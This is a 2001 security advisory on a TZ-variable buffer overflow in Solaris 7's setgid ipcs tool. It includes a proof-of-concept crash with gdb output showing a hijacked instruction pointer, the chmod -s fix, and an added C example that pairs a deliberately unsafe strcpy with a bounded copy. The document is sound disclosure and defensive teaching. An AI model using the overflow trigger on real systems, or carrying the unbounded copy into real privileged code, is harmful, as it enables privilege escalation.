Solaris ipcs Buffer Overflow

Published: 2001-04-14
Updated: 2001-04-14
Severity: High
Threat: Local administrator privileges
Error type: Configuration error
Exploit mode: Server mode

Affected systems
Solaris 7 (x86)

Detailed description
The /usr/bin/i86/ipcs tool shipped with Solaris 7 contains a buffer overflow. The problem lies in its handling of the TZ (TIMEZONE) environment variable; exploiting it can yield the privileges of the SYS group. ipcs is used to collect information about active inter-process communication facilities.

Test code

    bash-2.03$ TZ=`perl -e 'print "A"x1035'`
    bash-2.03$ /usr/bin/i86/ipcs
    IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
    Message Queue facility inactive.
    T         ID      KEY        MODE       OWNER    GROUP
    Shared Memory:
    m          0   0x500004d3 --rw-r--r--     root     root
    Semaphore facility inactive.
    Segmentation Fault (core dumped)

    Note: [buffer] is any 1036 (or so) character string. A's...

    bash-2.03$ su root
    Password:
    # gdb /usr/bin/i86/ipcs core
    GNU gdb 5.0
    Copyright 2000 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    <snip>
    #0  0x41414141 in ?? ()
    (gdb) info reg eip
    eip            0x41414141       0x41414141
    (gdb)

Solution
chmod -s /usr/bin/i86/ipcs

Related information
Riley Hassell riley@eeye.com
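The advisory does not include the ipcs source, so the following is an added example, not code from the advisory or from Solaris: a hypothetical reconstruction of the bug class (an unbounded copy of an environment variable into a fixed stack buffer, which is what makes eip end up as 0x41414141) placed beside the hardened form that bounds the copy and rejects oversized values. The buffer size TZ_MAX and all function names are assumptions chosen for the example; the real ipcs buffer size is not stated on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed upper bound on a TZ value the program will accept (hypothetical;
 * the real ipcs buffer size is not given in the advisory). */
#define TZ_MAX 128

/* Vulnerable pattern (hypothetical reconstruction of the bug class, not the
 * ipcs source): an unbounded copy of an environment variable into a fixed
 * stack buffer. A value longer than the buffer overwrites the saved return
 * address, which is why the crash lands at 0x41414141. Shown only as the
 * "before" picture; never call it with untrusted input. */
static void tz_copy_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: copy at most dstlen-1 bytes, always NUL-terminate, and
 * refuse (rather than silently truncate) a value that does not fit.
 * Returns 0 on success, -1 when src is NULL or too long. */
int tz_copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t i;
    if (dst == NULL || dstlen == 0 || src == NULL)
        return -1;
    for (i = 0; i < dstlen; i++) {
        dst[i] = src[i];
        if (src[i] == '\0')
            return 0;            /* terminator found within bounds */
    }
    dst[0] = '\0';               /* too long: leave an empty, valid string */
    return -1;
}

/* Does a TZ value with this content pass the bounded loader?  1 = yes. */
int accepts_tz_value(const char *value)
{
    char buf[TZ_MAX];
    return tz_copy_bounded(buf, sizeof buf, value) == 0;
}

/* Same check for a constructed value of n 'A' bytes (mirrors the advisory's
 * perl -e 'print "A"x1035' test input).  1 = accepted, 0 = rejected. */
int accepts_tz_of_length(size_t n)
{
    char *value = malloc(n + 1);
    int ok;
    if (value == NULL)
        return 0;
    memset(value, 'A', n);
    value[n] = '\0';
    ok = accepts_tz_value(value);
    free(value);
    return ok;
}

/* Stand-alone demo: load TZ from the real environment the safe way. */
int main(void)
{
    char buf[TZ_MAX];
    char demo[8];
    const char *tz = getenv("TZ");

    tz_copy_unbounded(demo, "UTC");     /* safe only because "UTC" fits */
    if (tz == NULL) {
        puts("TZ not set");
    } else if (tz_copy_bounded(buf, sizeof buf, tz) == 0) {
        printf("TZ accepted: %s\n", buf);
    } else {
        printf("TZ rejected: longer than %d bytes\n", TZ_MAX - 1);
    }
    return 0;
}
```

Rejecting an oversized value outright, instead of truncating it, is the safer choice for a setuid or setgid program: a truncated timezone string is still attacker-chosen data flowing into later parsing, whereas a rejected one never reaches it. The `chmod -s` in the Solution section removes the privilege boundary entirely, which is the right immediate mitigation when the binary cannot be patched.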